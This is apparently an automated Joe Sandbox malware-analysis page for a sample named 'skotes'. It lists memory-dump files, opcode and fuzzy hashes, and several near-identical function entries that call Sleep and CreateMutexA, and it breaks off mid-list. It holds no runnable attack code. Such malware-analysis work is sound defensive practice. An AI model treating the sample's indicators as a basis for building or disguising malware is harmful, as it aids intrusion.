Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4c7ee3ac07e589c5ebbdd30a9d82f1c28f9b32a3345884577eb12d889d9457d1
Instruction ID: 75e59bcfc37278516a8dde9dc217ead953ae131af523562481ab9cc368fa54c0
Opcode Fuzzy Hash: 4c7ee3ac07e589c5ebbdd30a9d82f1c28f9b32a3345884577eb12d889d9457d1
Instruction Fuzzy Hash: A9317F317042049BEB18AB7ADC897ECB762EF85320F20421DE418DB2C5C77A8980EB51

Function 00FBA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 499b9f1a192922c38a3b3c7d7f725743f9c45aeb5e2ba868b5a3580988560cb2
Instruction ID: fed82dfe3da35714d5b609545dfe0cac54e2afdd5206d02b1c588c658a61a51b
Opcode Fuzzy Hash: 499b9f1a192922c38a3b3c7d7f725743f9c45aeb5e2ba868b5a3580988560cb2
Instruction Fuzzy Hash: 0B312871B101449BEB18EB7DCD89BDDB762EB81320F20421DE4189B2D5D73A9980EF16

Function 00FBA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dab9ba8e0373bda77596a9009755899f1a57103894095504d76ea27a2a3acaee
Instruction ID: 092e381ce80107636e326e462ca54e0211b8edd8e161f66a296ca38c69987ac2
Opcode Fuzzy Hash: dab9ba8e0373bda77596a9009755899f1a57103894095504d76ea27a2a3acaee
Instruction Fuzzy Hash: A5314A71B001419BEB189B7EDD89BDDB762EF85320F20421DE4149B2D5D73A8980AF16

Function 00FBA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2700b9dcb65e361efe672c1b5bab7765f46769fe79191285535c00ef00ef7e9a
Instruction ID: 6cbe9141988f480f688c222f7194ef4b5ea1a525725ddf154609a926466ceced
Opcode Fuzzy Hash: 2700b9dcb65e361efe672c1b5bab7765f46769fe79191285535c00ef00ef7e9a
Instruction Fuzzy Hash: 31313971B00144DBEB18EB7EDD8DBEDB761EF81320F204219E418DB2D5D77A8980AB56

Function 00FBA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6ab8e425ee57e070e41acdd8b07f17fa8749fda8ac06c01ee6b711c018ac846a
Instruction ID: eb053906435d46ee256cfcfd589a18f382ca93a757e6c109320ef65fd683ea37
Opcode Fuzzy Hash: 6ab8e425ee57e070e41acdd8b07f17fa8749fda8ac06c01ee6b711c018ac846a
Instruction Fuzzy Hash: D1316A71B001448BEB18DB7ECD89BECB762EF85324F24421DE454EB2C5CB398980EB16

Function 00FBA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
